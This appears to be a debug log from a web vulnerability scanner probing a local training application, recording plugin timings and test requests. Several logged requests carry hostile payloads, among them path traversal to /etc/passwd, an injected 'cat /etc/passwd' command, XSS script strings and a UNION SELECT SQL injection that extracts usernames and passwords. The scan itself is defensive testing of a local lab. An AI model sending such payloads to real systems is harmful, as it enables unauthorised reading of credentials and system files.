Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:GEVb8vJP) [Wed Feb 12 10:04:27 2020 - debug] dwsync_xml.discover(did="Mm2Lb8rK",uri="http://localhost:9090/") took 1.88s to run [Wed Feb 12 10:04:27 2020 - debug] dot_listing.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=SBPN1VHQ) [Wed Feb 12 10:04:27 2020 - debug] [dot_listing] Crawling "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 10:04:27 2020 - debug] sqli.audit(did="AESHSGVw",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 1.88s to run [Wed Feb 12 10:04:27 2020 - debug] buffer_overflow.audit(did="w7s74F1b", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] dot_ds_store.discover(did="2q5dwpyO",uri="http://localhost:9090/") took 1.16s to run [Wed Feb 12 10:04:27 2020 - debug] content_negotiation.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=34H74q5M) [Wed Feb 12 10:04:27 2020 - debug] [content_negotiation] Crawling "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 10:04:27 2020 - debug] content_negotiation.discover(did="34H74q5M",uri="http://localhost:9090/learn/vulnerability/a7_xss") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] archive_dot_org.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=mEnkuPnr) [Wed Feb 12 10:04:27 2020 - debug] [archive_dot_org] Crawling "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 10:04:27 2020 - debug] Finished audit.phishing_vector (did=EP9oEKZQ) [Wed Feb 12 10:04:27 2020 - debug] phishing_vector.audit(did="EP9oEKZQ",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 1.51s to run [Wed Feb 12 10:04:27 2020 - debug] redos.audit(did="5qU4aghG", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] open_api.discover(did="lPyThtc2",uri="http://localhost:9090/") took 1.17s to run [Wed Feb 12 10:04:27 2020 - debug] wordnet.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=zwHwrKlb) [Wed Feb 12 10:04:27 2020 - debug] [wordnet] Crawling "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 10:04:27 2020 - debug] digit_sum.discover(did="rDdsULHd",uri="http://localhost:9090/") took 1.78s to run [Wed Feb 12 10:04:27 2020 - debug] phpinfo.discover(http://localhost:9090/learn/vulnerability/a7_xss, did=DkwKpQyN) [Wed Feb 12 10:04:27 2020 - debug] [phpinfo] Crawling "http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 10:04:27 2020 - debug] generic.audit(did="44qdlu35",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.05s to run [Wed Feb 12 10:04:27 2020 - debug] global_redirect.audit(did="kqTbYK08", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:kqTbYK08) [Wed Feb 12 10:04:27 2020 - debug] os_commanding.audit(did="pU260yyC",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 1.99s to run [Wed Feb 12 10:04:27 2020 - debug] xpath.audit(did="ZuycWS0R", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ZuycWS0R) [Wed Feb 12 10:04:27 2020 - debug] format_string.audit(did="W59M80Jk",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.05s to run [Wed Feb 12 10:04:27 2020 - debug] cors_origin.audit(did="cOVAKTzD", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] blind_sqli.audit(did="8Pbh8J3A",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 1.81s to run [Wed Feb 12 10:04:27 2020 - debug] htaccess_methods.audit(did="MeqboDR5", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] buffer_overflow.audit(did="w7s74F1b",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.02s to run [Wed Feb 12 10:04:27 2020 - debug] dav.audit(did="UzJHGk8O", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] memcachei.audit(did="ECfHhDR1",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.03s to run [Wed Feb 12 10:04:27 2020 - debug] ssi.audit(did="kMUP0kIv", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] xpath.audit(did="ZuycWS0R",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.02s to run [Wed Feb 12 10:04:27 2020 - debug] xxe.audit(did="dkIwCF3s", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] xxe.audit(did="dkIwCF3s",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4386. [Wed Feb 12 10:04:27 2020 - debug] websocket_hijacking.audit(did="2hDCYUIP",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.07s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4387. [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] redos.audit(did="5qU4aghG",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.04s to run [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4388. [Wed Feb 12 10:04:27 2020 - debug] ldapi.audit(did="GEVb8vJP",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.05s to run [Wed Feb 12 10:04:27 2020 - debug] dav.audit(did="UzJHGk8O",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.03s to run [Wed Feb 12 10:04:27 2020 - debug] eval.audit(did="6uDDG4sg", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] rosetta_flash.audit(did="Z5AoO4pu", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] rosetta_flash.audit(did="Z5AoO4pu",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] xss.audit(did="bLHcOmon", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] xst.audit(did="6Ue74keQ", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] xst.audit(did="6Ue74keQ",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] ssl_certificate.audit(did="rIFi9BvP", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] ssl_certificate.audit(did="rIFi9BvP",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] preg_replace.audit(did="eVX37iFG", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:eVX37iFG) [Wed Feb 12 10:04:27 2020 - debug] mx_injection.audit(did="4CReDQBl", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:4CReDQBl) [Wed Feb 12 10:04:27 2020 - debug] response_splitting.audit(did="xTtWv5Uc", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:xTtWv5Uc) [Wed Feb 12 10:04:27 2020 - debug] mx_injection.audit(did="4CReDQBl",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] rfd.audit(did="7EJSMeBx", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] URL "http://localhost:9090/learn/vulnerability/a3_sensitive_data" is not vulnerable to RFD because response content-type is "text/html" and content-disposition header is missing, response id 10437 [Wed Feb 12 10:04:27 2020 - debug] rfd.audit(did="7EJSMeBx",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] rfi.audit(did="PXTJ9Wj7", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:PXTJ9Wj7) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~guest returned HTTP code "404" (id=22891,from_cache=0,grep=1,rtt=0.03,did=Ge8TBRuF) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/index.php?download=/winnt/win.ini returned HTTP code "404" (id=22892,from_cache=0,grep=1,rtt=0.08,did=98rbroES) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/input.bat?|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\= returned HTTP code "404" (id=22893,from_cache=0,grep=1,rtt=0.13,did=2loH89vq) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/servlet/org.apache.catalina.ContainerServlet/ returned HTTP code "404" (id=22894,from_cache=0,grep=1,rtt=0.06,did=lcq1bgs2) [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] xss.audit(did="bLHcOmon",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.03s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/emailfriend/emailfaq.php?id=\\" returned HTTP code "404" (id=22889,from_cache=0,grep=1,rtt=0.08,did=Y1PmgUXl) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/test2.pl?lt=<=&script=>=>=&alert(\'Vulnerable\')=&/script= returned HTTP code "404" (id=22890,from_cache=0,grep=1,rtt=0.05,did=EvBlVOXS) [Wed Feb 12 10:04:27 2020 - debug] response_splitting.audit(did="xTtWv5Uc",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.03s to run [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:6uDDG4sg) [Wed Feb 12 10:04:27 2020 - debug] frontpage.audit(did="XhhoJlRz", uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/vq/demos/respond.pl?= returned HTTP code "404" (id=22887,from_cache=0,grep=1,rtt=0.04,did=R3l8gQDC) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/SiteServer/Knowledge/Default.asp?ctr=\\"> returned HTTP code "404" (id=22888,from_cache=0,grep=1,rtt=0.09,did=e9a3ZWwW) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer returned HTTP code "404" (id=22895,from_cache=0,grep=1,rtt=0.14,did=xiFQa0UO) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4389. [Wed Feb 12 10:04:27 2020 - debug] symfony.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] rfi.audit(did="PXTJ9Wj7",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.15s to run [Wed Feb 12 10:04:27 2020 - debug] preg_replace.audit(did="eVX37iFG",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.15s to run [Wed Feb 12 10:04:27 2020 - debug] svn_users.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] motw.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/default.htm returned HTTP code "404" (id=22897,from_cache=0,grep=1,rtt=0.15,did=3THSNWim) [Wed Feb 12 10:04:27 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 10:04:27 2020 - debug] file_upload.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] expect_ct.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] private_ip.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] frontpage.audit(did="XhhoJlRz",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.14s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~smmsp returned HTTP code "404" (id=22896,from_cache=0,grep=1,rtt=0.12,did=fisZF7xE) [Wed Feb 12 10:04:27 2020 - debug] meta_generator.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] retirejs.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] serialized_object.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] blank_body.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] credit_cards.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] websockets_links.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] csp.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] dom_xss.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] vulners_db.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] keys.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] clamav.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] objects.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] error_500.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] meta_tags.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] password_profiling.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] click_jacking.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] lang.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/<script>alert(\'Vulnerable\');</script> returned HTTP code "404" (id=22904,from_cache=0,grep=1,rtt=0.07,did=w3A2vSnX) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=22901,from_cache=0,grep=1,rtt=0.11,did=F6KD1gQF) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/addressbook/index.php?name= returned HTTP code "404" (id=22902,from_cache=0,grep=1,rtt=0.05,did=DWHKkCm1) [Wed Feb 12 10:04:27 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 11690, 'reject-seen-url': 5579, 'reject-out-of-scope': 215, 'accept': 4791} [Wed Feb 12 10:04:27 2020 - debug] strange_reason.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] cache_control.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] strange_headers.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] ssn.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] oracle.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] feeds.grep(uri="http://localhost:9090/svc/payment.rb") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/a3_sensitive_data" () [Wed Feb 12 10:04:27 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:kMUP0kIv) [Wed Feb 12 10:04:27 2020 - debug] localhost:9090 connection pool stats (free:105 / in_use:7 / max:50 / total:112) [Wed Feb 12 10:04:27 2020 - debug] Connections with more in use time: (e27f160ee9b98911, 0.21 sec) (f59f64952b2172cf, 0.18 sec) (49303da565ef873b, 0.17 sec) (b885566e5a990404, 0.14 sec) (f68474ff126c8504, 0.12 sec) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cplogfile.log returned HTTP code "404" (id=22899,from_cache=0,grep=1,rtt=0.04,did=fayeuqgt) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4390. [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/myphpnuke/links.php?op=search&query=[script]alert(\'Vulnerable)&[/script]?query= returned HTTP code "404" (id=22903,from_cache=0,grep=1,rtt=0.14,did=7rIrwgYE) [Wed Feb 12 10:04:27 2020 - debug] url_session.grep(uri="http://localhost:9090/svc/payment.rb") took 0.21s to run [Wed Feb 12 10:04:27 2020 - debug] error_pages.grep(uri="http://localhost:9090/svc/payment.rb") took 0.20s to run [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/DCShop/auth_data/auth_user_file.txt returned HTTP code "404" (id=22905,from_cache=0,grep=1,rtt=0.20,did=qsquPmaz) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/index.php?action=storenew&username= returned HTTP code "404" (id=22898,from_cache=0,grep=1,rtt=0.03,did=JLuGO5Q3) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse c:\\boot.ini= returned HTTP code "404" (id=22909,from_cache=0,grep=1,rtt=0.11,did=WGjx0Y9b) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/phorum/admin/footer.php?GLOBALS[message]= returned HTTP code "404" (id=22910,from_cache=0,grep=1,rtt=0.20,did=ThatBTBU) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/learn/vulnerability/a3_sensitive_data returned HTTP code "200" (id=22912,from_cache=0,grep=1,rtt=0.08,did=hEfZumL4) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/faxsurvey?cat /etc/passwd= returned HTTP code "404" (id=22914,from_cache=0,grep=1,rtt=0.16,did=w0hyErDV) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/user.php?op=userinfo&uname== returned HTTP code "404" (id=22918,from_cache=0,grep=1,rtt=0.19,did=SP9mMLYJ) [Wed Feb 12 10:04:27 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/svc/payment.rb") took 0.21s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/sawmill?rfcf "SawmillInfo/SawmillPassword" spbn 1,1,21,1,1,1,1,1,1,1,1,1 3= returned HTTP code "404" (id=22906,from_cache=0,grep=1,rtt=0.07,did=UTf8Fhkk) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/pm_buddy_list.asp?name=A&desc=B">alert(\'Vulnerable\') returned HTTP code "404" (id=22923,from_cache=0,grep=1,rtt=0.17,did=tmvvSu4j) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/php.cgi?/etc/passwd= returned HTTP code "404" (id=22915,from_cache=0,grep=1,rtt=0.20,did=F98XotME) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/* returned HTTP code "404" (id=22925,from_cache=0,grep=1,rtt=0.15,did=65wKOTcU) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/FormMail.cgi?= returned HTTP code "404" (id=22908,from_cache=0,grep=1,rtt=0.06,did=EPc3uxT6) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/retrieve_password.pl returned HTTP code "404" (id=22929,from_cache=0,grep=1,rtt=0.13,did=nZtADkSN) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/learn/vulnerability/wp-login.php returned HTTP code "404" (id=22928,from_cache=0,grep=1,rtt=0.09,did=qh4XuhnX) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/learn/vulnerability/a5_broken_access_control returned HTTP code "200" (id=22926,from_cache=0,grep=0,rtt=0.05,did=T3i8wZVQ) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/learn/vulnerability/a3_sensitive_data returned HTTP code "200" (id=22927,from_cache=0,grep=1,rtt=0.11,did=cOVAKTzD) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/article.cfm?id=1\'= returned HTTP code "404" (id=22922,from_cache=0,grep=1,rtt=0.14,did=aqga0GwP) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/modules.php?op=modload&name=Xforum&file=member&action=viewpro&member= returned HTTP code "404" (id=22907,from_cache=0,grep=1,rtt=0.07,did=n8i5YM4I) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/admin/system_footer.php returned HTTP code "404" (id=22930,from_cache=0,grep=1,rtt=0.08,did=oV3Ai7JB) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/downloads/pafiledb.php?action=download&id=4?\\"<=<=&script=>=>=&alert(\'Vulnerable\')=&/script=&\\"= returned HTTP code "404" (id=22917,from_cache=0,grep=1,rtt=0.11,did=4zV2hp3I) [Wed Feb 12 10:04:27 2020 - debug] file_upload.audit(did="FYw2zhoo", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:27 2020 - debug] file_upload.audit(did="FYw2zhoo",uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") took 0.00s to run [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/sunshop.index.php?action=storenew&username= returned HTTP code "404" (id=22920,from_cache=0,grep=1,rtt=0.18,did=31IQ33mE) [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cbms/changepass.php returned HTTP code "404" (id=22921,from_cache=0,grep=1,rtt=0.21,did=V7zWcsqP) [Wed Feb 12 10:04:27 2020 - debug] global_redirect.audit(did="kqTbYK08",uri="http://localhost:9090/learn/vulnerability/a3_sensitive_data") took 0.81s to run [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/cgi-bin/scoadminreg.cgi returned HTTP code "404" (id=22924,from_cache=0,grep=1,rtt=0.14,did=whQHlDvk) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/search?NS-query-pat=../../../../../../../../../../etc/passwd returned HTTP code "404" (id=22931,from_cache=0,grep=1,rtt=0.02,did=cKu1Euwv) [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4392. [Wed Feb 12 10:04:27 2020 - debug] HEAD http://localhost:9090/................../config.sys returned HTTP code "404" (id=22934,from_cache=0,grep=1,rtt=0.11,did=W2nAwScZ) [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/emailfriend/emailarticle.php?id=\\" returned HTTP code "404" (id=22935,from_cache=0,grep=1,rtt=0.08,did=cSF7GsTh) [Wed Feb 12 10:04:27 2020 - debug] csrf.audit(did="7ut78yeK", uri="http://localhost:9090/learn/vulnerability/a5_broken_access_control") [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] localhost:9090 connection pool stats (free:112 / in_use:1 / max:50 / total:113) [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] GET http://localhost:9090/cgi-bin/cgiwrap/~smtp returned HTTP code "404" (id=22936,from_cache=0,grep=1,rtt=0.07,did=0w3jLylR) [Wed Feb 12 10:04:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2121. [Wed Feb 12 10:04:27 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 